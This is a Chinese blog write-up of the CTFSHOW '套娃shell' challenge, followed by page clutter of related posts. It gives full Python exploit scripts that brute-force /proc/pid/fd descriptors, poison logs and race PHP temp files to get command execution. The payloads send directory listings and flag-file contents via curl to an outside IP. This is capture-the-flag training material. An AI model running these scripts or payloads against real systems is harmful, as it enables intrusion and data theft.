CTFSHOW 套娃shell

最新推荐文章于 2024-03-21 22:32:22 发布
最新推荐文章于 2024-03-21 22:32:22 发布
阅读量2.2k 收藏
点赞数
文章标签: ctf php python java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/miuzzx/article/details/124489107
版权

CTFSHOW 套娃shell

1、题目给的是用nc连接的,测试了下,传个请求包过去就可以了,比如(最后的换行不要忘了):

GET /?file=/a HTTP/1.1
Host: 127.0.0.1
Connection: close

但是又不是完全是按照这个请求包来的,把host改成其他的,也是可以成功。说明不是完全按照请求头的规则来读取的。
题目里面的正则表达式大概意思就是以/开头,并且后面只能有数字字母和/
我们需要在服务器上构造一个文件,并且文件内容是可控的,或者是服务器本身就有这样的文件也是可以的。
思来想去只能是构造一个临时文件,或者可以日志可控。
2、根据返回的请求包可以看到题目环境是php7.3.2+nginx,所以日志一般位置为/var/log/nginx/access.log。很不幸文件名存在点号。
3、如果单纯的上传文件然后留下/tmp/phpxxxxxx形式的文件的话,爆破的可能性微乎其微,况且文件不是永久存在的。
4、最后对于我来说可以考虑的就只剩文件描述符了。/proc/pid/fd/xxx可能存在web日志。而pid我们通过传一个不带参数的get请求就可以得到。

在这里插入图片描述
比如我这个是125。
经过测试循环跑上一段时间就可以读到日志

import socket
import re
s=socket.socket()
s.connect(('pwn.challenge.ctf.show',28099))
s.send(f'''GET / HTTP/1.1
Host:127.0.0.1

	'''.encode())
data=s.recv(1024).decode()
s.close()
pid = re.findall('(.*?) www-data',data)[0].strip()
while True:
	for i in range(0,256):
		s=socket.socket()
		s.connect(('pwn.challenge.ctf.show',28099))
		file=f"/proc/{pid}/fd/{i}"

		s.send(f'''GET /?file={file} HTTP/1.1
Host:127.0.0.1
User-Agent: yu22x
Connection: close

			'''.encode())
		data=s.recv(1024)
		s.close()
		if "yu22x" in data.decode():
			print(i,'\n',data.decode())
			exit(0)

可以看到可以读取到日志
在这里插入图片描述
并且有内容是可控的,那么我们第一次访问的时候带上shell在请求头里面。

import socket
import re
s=socket.socket()
s.connect(('pwn.challenge.ctf.show',28197))
s.send(f'''GET /curl http://vps:4567?s=`ls` HTTP/1.1
Host:127.0.0.1

	'''.encode())
data=s.recv(1024).decode()
s.close()
pid = re.findall('(.*?) www-data',data)[0].strip()
print(pid)
while True:
	for i in range(0,256):
		s=socket.socket()
		s.connect(('pwn.challenge.ctf.show',28197))
		file=f"/proc/{pid}/fd/{i}"

		s.send(f'''GET /?file={file} HTTP/1.1
Host:127.0.0.1
User-Agent: yu22x
Connection: close

			'''.encode())
		data=s.recv(1024)
		s.close()
		if "yu22x" in data.decode():
			print(i,'\n',data.decode())
			exit(0)

日志里面也确实出现了,并且没有因为请求头第一行的空格而请求失败。
在这里插入图片描述

本地测试shell_exec是可以执行上面报错的内容的(分号不会影响后面的命令,并且井号注释了后面的多余内容),但是不知道为啥靶机执行失败了。
在这里插入图片描述

5、所以不得已考虑其他方式,前几天虎符线上赛有个题也是用到了fd。当时参考的文章是https://tttang.com/archive/1384/
大概意思就是如果post传一段很大的数据,首先生成临时文件,然后请求结束后被删除。不过该文件其实还会存在于/proc/pid/fd/xxx下,而后面的xxx范围很小,可以爆破出来的。pid们上面已经可以得到了。

思路基本上就理清了,一边post传数据,一边遍历fd下的文件。

这里就不细究后端怎么对请求包处理的了。

exp

import  threading, requests
import socket
import re
port= 28053
s=socket.socket()
s.connect(('pwn.challenge.ctf.show',port))
s.send(f'''GET / HTTP/1.1
Host:127.0.0.1

	'''.encode())
data=s.recv(1024).decode()
s.close()
pid = re.findall('(.*?) www-data',data)[0].strip()
print(pid)

con="curl http://101.34.94.44:4567?`cat /f*`;"+'0'*1024*500
l = len(con)
def upload():
	while True:
		s=socket.socket()
		s.connect(('pwn.challenge.ctf.show',port))
		x=f'''POST / HTTP/1.1
Host: 127.0.0.1
Content-Length: {l}
Content-Type: application/x-www-form-urlencoded
Connection: close

{con}

		'''.encode()
		s.send(x)
		s.close()

def bruter():
	while True:
		for fd in range(3,40):
			print(fd)
			s=socket.socket()
			s.connect(('pwn.challenge.ctf.show',port))
			s.send(f'''GET /?file=/proc/{pid}/fd/{fd} HTTP/1.1
Host: 127.0.0.1
Connection: close

'''.encode())
			print(s.recv(2048).decode())
			s.close()


for i in range(30):
    t = threading.Thread(target=upload)
    t.start()
for j in range(30):
    a = threading.Thread(target=bruter)
    a.start()
yu22x
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
俄罗斯套娃程序及设计
06-09
1.递归函数遍历可达路径。 2.在递归函数调用时记录路经(保存在向量path_now中),并记录当前的套娃总重(score_now)。 3.走过的没有套娃的路口,将其值修改为HPZD(即0XFFFFFFFF),表明该路口已走过。 4.当递归函数返回时恢复path_now和score_now,并将当前函数所标记的HPZD(如果有)去除,即把该路口的值由HPZD改为0。 5.当一条路径走到死胡同时,比较score_now和score_best(此前的最大重量)。 如果score_now比score_best大,说明当前路径是目前为止最好的。把当前的路径替代之前最好的路径(path_best=path_now),并替换相应的套娃总重(score_best=score_now)。
俄罗斯套娃奖品Java程序
08-12
网上有套娃的VC程序,c程序,这是我改写的Java版本。
ctfer的web日常:给你shellctfshow)
最新发布
Hunter1_1的博客
03-21 410
因为数字与0xC0为0;所有可以得知$flag_md5前3位为数字;故secret = 115满足$obj['secret']!查看源码,发现“/?发现好多东西都被禁了;
俄罗斯套娃奖品C++程序
05-19
非常经典的程序,曾是中兴“捧月杯”参赛程序。程序里面使用使用C++编程
中兴捧月俄罗斯套娃程序代码
05-23
第二届中兴“捧月杯”预赛俄罗斯套娃源程序
俄罗斯套娃
04-17
俄罗斯套娃动作数据
nc: getnameinfo: Temporary failure in name resolution问题处理
SHELLCODE_8BIT的博客
06-20 2959
我们查看nc命令,得知nc -lvp为监听,输出详细信息verbose,p监听端口,而我们使用下面方式取代。 使用下列命令代替,增加n参数,不对ip:port解析。
ctf MISC 简单套娃
god_001的博客
03-27 1091
题目给了一个图片 用010editor分析,发现两个 FF D8(JPG图像起始位置),复制第二段开始的数据另存为JPG图像 将得到的两个图象使用Stegsolve里的"Image Combiner"模式(图片拼接),在SUB(R,G,B)模式下得到flag 对于Stegsolve的使用: 其有 File Format、Data Extract、Steregram Solve、Frame Browser、Image Combiner五种功能 File Format文件格式功能下,可查看图片的
合天网安 CTF之第六周-套娃一样的上传
未来社会二十年发展的核心技术趋势由ABCD四个字母组成,分别是AI(人工智能)、BlockChain(区块链)、Cloud(云)、和Data(大数据)每一次进步都有新的认知和感触
11-10 380
本实验无writeup,需要同学们发挥自己所学,一步一步寻找线索,寻找细节信息,最终拿下目标flag。
ctfshow 36D练手赛 超超超级详解 ==
梦想不是挂在嘴边炫耀的空气,而是需要认真实践,等到对的风,就展翅翱翔!
09-30 1239
1、不知所措.jpg 这题对我这个新手来说真的是一言难尽…太吃经验了,老手肯定是分分钟解决 打开页面,这里的意思是变量$file必须要有test 首先猜测变量$file是通过$_GET['file']GET请求得到的且为?file=test ??自动给我加了一个php 难道是存在一个test.php文件?尝试,输入test自动补php,index.php?file=test.php,这是一个文件包含? 也确实存在,貌似是文件包含,但是它说flag不在这儿 既然是文件包含,尝试用php:
CTFshow之36Dweb做题记录
bmth666的博客
08-08 2196
WEB_给你shell 打开题目首先F12,得到信息 那么?view_source=flag.txt得到了源码: <?php //It's no need to use scanner. Of course if you want, but u will find nothing. error_reporting(0); include "config.php"; if (isset(...
ctfshow 36d
blowed的博客
03-18 1466
36D练手赛不知所措easy shell36D杯给你shellWUSTCTF朴实无华RevengeALL_INFO_U_WANT你取吧 36D练手赛 不知所措 $file 暗示参数为file 且url必须含有test ?file=php://filter/convert.base64-encode/resource=test/../index. ​ 解码得到源代码 <?php error_reporting(0); $file=$_GET['file']; $file=$file.'ph.
ctf (套娃)
Glacier_Mount的博客
07-21 4736
键盘流量
BUUCTF-[GXYCTF2019]禁止套娃
yuqie的博客
04-06 235
对于第二个if,(?R)是引用当前表达式,(?\),可以迭代下去,那么它所匹配的就是print(echo(1))、a(b(c()));所以可以先利用函数array_reverse将数组反转,flag就在第二位了,再利用next指向第二位数组,在用文件显示包涵即可输出flag.php文件,构造payload。开始审计源码,我们最终的目标是执行@eval($_GET['exp']),从这开始瞄一下大佬的wp,因为我的脚本基础差的没眼看。pos(),传入数组,回显第一个数组的值,pos可以用current代替。
CTFSHOW 常用姿势篇(811-820)
羽的博客
04-17 1973
CTFSHOW 常用姿势篇 群主在视频里面已经讲解的很清楚了,下面内容有些简略,就当补充下payload了。 文章目录CTFSHOW 常用姿势篇web811web812 web811 1、搭建恶意ftp服务器 import socket s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind(('0.0.0.0',4566)) #端口可改 s.listen(1) conn, addr = s.accept() conn.send(b'220
(2)shell编程学习 Shell中的变量(预设变量表)及变量定义与特殊变量 (脚本小子的进阶之路)
AAAAAAAAAAAA66的博客
12-27 1292
这里尽量以较简略的篇幅讲解,如果之前有Python PHP语言基础的话,学习应该非常快。当然文章篇幅有限,只能讲一些主要的地方,一些偏的知识可能不讲。 目录 变量 局部变量 环境变量 自定义环境变量 系统预设环境变量(这个标题下面的都是) 变量:BASH 变量:BASH_VERSION 变量:CDPATH 变量:EUID 变量:FUNCNAME 变量:HISCMD 变量:HISTFILE 变量:HISTFILESIZE 变量:HISTSIZE 变量:HOSTNAME 变量.
CTFshow 36D杯 web系列
羽的博客
05-05 3348
0x01 WEB_你取吧 题目源码 <?php error_reporting(0); show_source(__FILE__); $hint=file_get_contents('php://filter/read=convert.base64-encode/resource=hhh.php'); $code=$_REQUEST['code']; $_=array('a','b','c'...
【BUUCTF】[MRCTF2020]套娃
pofesser的博客
01-19 2969
思考 题目是套娃,感觉应该是一环一环的走下去,每个问题应该不是很难,按着他的提示做吧。 知识点 刷题 刷题的时候,习惯先查看robots.txt是否有敏感信息,然后查看源码。如果这个时候,都没有尝试爆目录了。 查看robots.txt无信息,查看源码。 ![在这里插入图片描述](https://img-blog.csdnimg.cn/8d8ab23f032845a691d260644c24d003.png?x-oss-process=image/watermark,type_d3F5LXplbmhl
俄罗斯套娃问题
不远远方
08-14 3466
【题目】 输入:第一行 n ,表示有n个套娃。之后n行,每行两个整数:分别表示宽和高。 只有宽和高都大于的才能嵌套。 输出:嵌套的最大层数。 提示:插入排序+LIS算法(最大上升子序列) 【解答】 方法一:暴力算法,空间复杂度为O(1)(不算读取数据的数组)。时间复杂度:O(n*n)。 import java.util.Scanner; public class Russia...
ctfshow套娃shell
08-24
CTFSHOW套娃shell是一种常见的利用技术,用于在Web应用程序中执行命令和控制服务器。根据提供的引用内容,以下是一种使用CTFSHOW套娃shell的方法: 1. 首先,需要获取CTFSHOW扩展。可以通过运行命令`...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

yu22x

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值